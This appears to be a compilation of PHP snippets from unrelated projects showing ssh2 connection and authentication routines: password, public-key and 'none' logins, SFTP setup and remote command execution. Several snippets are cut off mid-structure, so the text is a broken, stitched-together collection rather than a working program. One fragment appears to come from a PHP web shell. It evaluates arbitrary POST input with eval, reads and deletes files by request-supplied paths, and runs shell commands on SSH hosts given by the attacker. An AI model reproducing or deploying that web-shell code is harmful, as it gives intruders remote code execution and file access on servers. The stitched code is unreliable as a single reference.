public function Authenticate($uid, $pass)
{
$this->AuthResult = false;
// Connect
$con = ssh2_connect($this->RemoteHost, $this->RemotePort);
if ($con === false) {
return ulLoginBackend::ERROR;
}
// Check fingerprint
if ($this->RemoteFingerprint != '') {
if (ssh2_fingerprint($con, SSH2_FINGERPRINT_SHA1 | SSH2_FINGERPRINT_HEX) != $this->RemoteFingerprint) {
return ulLoginBackend::ERROR;
}
}
// Test if server supports password-based authentication
$auth_methods = ssh2_auth_none($con, 'user');
if (!in_array('password', $auth_methods)) {
return ulLoginBackend::ERROR;
}
// Connect again, because we can only try to authenticate once on a connection
$con = ssh2_connect($this->RemoteHost, $this->RemotePort);
if ($con === false) {
return ulLoginBackend::ERROR;
}
// Try to authenticate
if (ssh2_auth_password($con, $uid, $pass)) {
$this->AuthResult = $uid;
return true;
} else {
return ulLoginBackend::BAD_CREDENTIALS;
}
}
function _startup()
{
$this->_link = @ssh2_connect($this->hostname, $this->port ? $this->port : 22);
if (!is_null($this->username)) {
$login = @ssh2_auth_password($this->_link, $this->username, $this->password);
} else {
$login = @ssh2_auth_none($this->_link, "anonymous");
}
if (!$this->_link || is_array($this->_link) || !$login) {
internal_error(!$login ? "remote_authentication_failed" : "remote_connection_failed");
}
$this->_sftp = @ssh2_sftp($this->_link, true);
}
function login($username, $password)
{
$auth_methods = ssh2_auth_none($this->connection, $username);
if (!in_array('password', $auth_methods)) {
return $this->raiseError("The SSH Server does not support password based authentication");
}
if (!@ssh2_auth_password($this->connection, $username, $password)) {
return $this->raiseError("Could not authenticate with username {$username} " . "(using a password).");
}
$this->sftp = @ssh2_sftp($this->connection);
if (!$this->sftp) {
return $this->raiseError("Could not initialize SFTP subsystem.");
}
}
/**
* @param $resource
*
* @throws AuthenticationFailed
*/
public function authenticate($resource)
{
if (true !== ssh2_auth_none($resource, $this->username)) {
throw new AuthenticationFailed();
}
}
/**
* Attempts to authorize the given ssh2 connection resource
*
* @param resource $connectionResource Ssh2_connect connection resource
* @return boolean True on success
* @throws Exception Username not set!
* @throws Exception Mode not set!
* @throws Exception Password required for PASSWORD mode!
* @throws Exception Public Key required for PUBLIC KEY mode!
* @throws Exception Private Key required for PUBLIC KEY mode!
*/
public function authorizeSshConnection($connectionResource)
{
if ($connectionResource === null || $connectionResource === false) {
throw new Exception("Connected Ssh resource is required!");
}
$this->validate();
//passed the validation so we can really authorize the connection
switch ($this->mode) {
case AuthMode::NONE:
$authResult = ssh2_auth_none($connectionResource, $this->username);
if ($authResult !== true) {
//we ignore here the fact of returning possible auth options: we want to authorize using this method. Full stop.
return false;
} else {
return true;
}
case AuthMode::PASSWORD:
return ssh2_auth_password($connectionResource, $this->username, $this->password);
case AuthMode::PUBLIC_KEY:
return ssh2_auth_pubkey_file($connectionResource, $this->username, $this->publicKey, $this->privateKey, $this->privateKeyPassphrase);
}
}
/**
* Create SSH connection
*/
protected function makeConnection()
{
$host = $this->host;
// Extract from hostname
$matches = null;
if (!preg_match('/^(?:([^:@]++)(?:\\:([^:@]++))?@)?([^:@]++)(?:\\:([^:@]++))?$/', $host, $matches)) {
throw new Exception("Could not create SSH connection: Illegal host string.");
}
$matches = $matches + array_fill(0, 5, null);
list(, $username, $password, $host, $port) = $matches;
// Get user/password
if (!empty($this->options->username)) {
$username = $this->options->username;
}
if (empty($username)) {
$_tmp_ = posix_getpwuid(posix_getuid());
$username = $_tmp_['name'];
}
if (!empty($this->options->password)) {
$password = $this->options->password;
}
// Get port
$port = !empty($this->options->port) ? $this->options->port : 22;
if (isset($port) && !is_int($port) && !ctype_digit($port)) {
throw new Exception("Could not create SSH connection for '{$host}': Given port '{$port}' is not a numeric value.");
}
// Get methods and callbacks
if (!isset($this->options->methods)) {
$this->options->methods = array_chunk_assoc($this->options, 'methods');
}
if (!isset($this->options->callbacks)) {
$this->options->callbacks = array_chunk_assoc($this->options, 'callbacks');
}
// Make the connection
$this->connection = ssh2_connect($host, $port, $this->options->methods, $this->options->callbacks);
if (!$this->connection) {
throw new Exception("Could not create SSH connection for '{$host}:{$port}': Failed to connect to server.");
}
// Autenticate
$auth_methods = isset($this->options->auth) ? (array) $this->options->auth : ssh2_auth_none($this->connection, $username);
$authenticated = $auth_methods === true;
while (!$authenticated && current($auth_methods)) {
switch (current($auth_methods)) {
case 'none':
$authenticated = @ssh2_auth_none($this->connection, $username) === true;
break;
case 'password':
$authenticated = isset($password) && @ssh2_auth_password($this->connection, $username, $password);
break;
case 'publickey':
$authenticated = @ssh2_auth_pubkey_file($this->connection, $username, $this->options->pubkeyfile, $this->options->privkeyfile, $this->options->passphrase);
break;
case 'hostbased':
$authenticated = @ssh2_auth_hostbased_file($this->connection, $username, $this->options->hostbased, $this->options->pubkeyfile, $this->options->privkeyfile, $this->options->passphrase);
break;
}
next($auth_methods);
}
if (!$authenticated) {
throw new Exception("Could not create SSH connection for '{$host}:{$port}': Authentication for user '{$username}' failed (" . join(', ', $auth_methods) . ").");
}
}
public function login()
{
$username = $this->getUsername();
$password = $this->getPassword();
$publicKey = $this->getPublicKey();
$privateKey = $this->getPrivateKey();
$hostKey = $this->getHostKey();
// Auth using keys
if ($publicKey && $privateKey && $hostKey) {
$return = @ssh2_auth_pubkey_file($this->getResource(), $username, $publicKey, $privateKey, $password);
} else {
if ($username && $password) {
$return = @ssh2_auth_password($this->getResource(), $username, $password);
} else {
$return = @ssh2_auth_none($this->getResource(), $username);
}
}
// Failure
if (!$return) {
throw new Engine_Vfs_Adapter_Exception('Login failed.');
}
return $this;
}
/**
*
* Export centreon-syslog-server configuration file using SSH2
* @param array $Syslog_options
* @return string
*/
function sshExportConfFile($Syslog_options)
{
global $tmp_file, $conf_file;
$connection = ssh2_connect($Syslog_options["ssh_server_address"], $Syslog_options["ssh_server_port"], array('hostkey' => 'ssh-rsa'));
if (!$connection) {
$output = _("Unable to connect on distant server.");
return $output;
}
if (strlen($Syslog_options["ssh_password"]) == 0) {
$status = ssh2_auth_none($connection, $Syslog_options["ssh_username"]);
} else {
$status = ssh2_auth_password($connection, $Syslog_options["ssh_username"], $Syslog_options["ssh_password"]);
}
if (!$status) {
$output = _("Authentification failed.");
return $output;
}
$status = ssh2_scp_send($connection, $tmp_file, $Syslog_options["configuration_dir"] . "/" . $conf_file, 0664);
if (!$status) {
$output = _("Unable to export configuration file. Rights may be not correct on distant directory.");
return $output;
}
return _("Configuration file exported successfully");
}
/**
* {@inheritDoc}
*/
public function authenticate($session)
{
return true === ssh2_auth_none($session, $this->username);
}
} else {
$rezult = fread($fh, filesize($_POST["pcfile"]));
fclose($fh);
echo $rezult;
if ($_POST["delrezult"] == "on") {
unlink($_POST["pcfile"]);
}
}
break;
case "eval":
eval($_POST["command"]);
break;
case "ssh2":
$connection = ssh2_connect($_POST["ssh2host"], $_POST["ssh2port"]) or die("cant connect. host/port wrong?");
//using knowingly wrong username to test auth. methods
$auth_methods = ssh2_auth_none($connection, '12309tezt');
if (in_array('password', $auth_methods)) {
$connection = ssh2_connect($_POST["ssh2host"], $_POST["ssh2port"]) or die("cant connect. host/port wrong?");
//need to connect again after failed login
if (ssh2_auth_password($connection, '' . $_POST["ssh2user"] . '', '' . $_POST["ssh2pass"] . '')) {
$stream = ssh2_exec($connection, $shelltext);
stream_set_blocking($stream, true);
$data = "";
while ($buf = fread($stream, 4096)) {
$data .= $buf;
}
fclose($stream);
echo $data;
} else {
echo "cant login. user/pass wrong?";
}
/**
* Ensure that SSH connection is up and can be used for file operations.
*
* @throws ServerException
*/
protected function connect()
{
$session = ssh2_connect($this->options['host'], $this->options['port'], $this->options['methods']);
if (empty($session)) {
throw new ServerException("Unable to connect to remote SSH server '{$this->options['host']}'.");
}
//Authorization
switch ($this->options['authMethod']) {
case self::NONE:
ssh2_auth_none($session, $this->options['username']);
break;
case self::PASSWORD:
ssh2_auth_password($session, $this->options['username'], $this->options['password']);
break;
case self::PUB_KEY:
ssh2_auth_pubkey_file($session, $this->options['username'], $this->options['publicKey'], $this->options['privateKey'], $this->options['secret']);
break;
}
$this->sftp = ssh2_sftp($session);
}
/**
* Login using a public key.
* Wrapping ssh2_auth_pubkey_file and ssh2_sftp
*
* (non-PHPdoc)
* @see kFileTransferMgr::doLoginPubKey()
*/
protected function doLoginPubKey($username, $pubKeyFile, $privKeyFile, $passphrase = null)
{
$methods = ssh2_auth_none($this->getSsh2Connection(), $username);
if ($methods === true) {
return true;
}
if (!in_array('publickey', $methods)) {
throw new kFileTransferMgrException("Public key authentication is not supported by the server.", kFileTransferMgrException::cantAuthenticate);
}
$this->username = $username;
$this->privKeyFile = $privKeyFile;
$this->passphrase = $passphrase;
// try to login
if (ssh2_auth_pubkey_file($this->getSsh2Connection(), $username, $pubKeyFile, $privKeyFile, $passphrase)) {
$this->sftpId = ssh2_sftp($this->getSsh2Connection());
return $this->sftpId != false && $this->sftpId != null;
} else {
return false;
}
}
/**
* Run SSH authentication based on the selected method
*
* @param resource $connection
* @param int $method
* @param mixed ...$args
*
* @return void
*/
protected function __authenticate($connection, $method, ...$args)
{
switch ($method) {
case SecureShell::AUTH_PASSWORD:
return ssh2_auth_password($connection, ...$args);
case SecureShell::AUTH_PUBKEY:
return ssh2_auth_pubkey_file($connection, ...$args);
case SecureShell::AUTH_HOSTKEY:
return ssh2_auth_hostbased_file($connection, ...$args);
case SecureShell::AUTH_AGENT:
return ssh2_auth_agent($connection, ...$args);
case SecureShell::AUTH_NONE:
return ssh2_auth_none($connection, ...$args);
default:
throw new ModuleException(__CLASS__, 'Unsupported authentication method');
}
}
/**
* Execute command
*
* @param string $command The extending command to execute
* @param boolean $overwriteCommand Execute only the extending command?
*
* @return boolean
*/
private function executeCommand($command, $overwriteCommand = false)
{
if (!$this->server) {
return false;
}
if (!$overwriteCommand) {
if ($this->address) {
$command = sprintf(self::ARGUMENT_ADDRESS, $this->address) . $command;
}
if ($this->priority) {
$command .= sprintf(self::ARGUMENT_PRIORITY, $this->priority);
}
if ($this->duration) {
$command .= sprintf(self::ARGUMENT_DURATION, $this->duration);
}
$command = sprintf(self::COMMAND, $command);
}
if ($this->debug) {
error_log("Executing '" . self::APPLICATION . "' command to '{$this->server}': {$command}");
}
if ($this->server == '127.0.0.1' || $this->server == getHostByName(getHostName())) {
$this->output = shell_exec($command);
} else {
$connection = ssh2_connect($this->server, 22);
if (!$this->username) {
return false;
}
if ($this->password) {
ssh2_auth_password($connection, $this->username, $this->password);
} else {
ssh2_auth_none($connection, $this->username);
}
$this->output = ssh2_exec($connection, $command);
}
if ($this->sleep) {
sleep($this->sleep);
}
$this->resetArguments();
if ($this->output === null) {
return false;
}
return true;
}
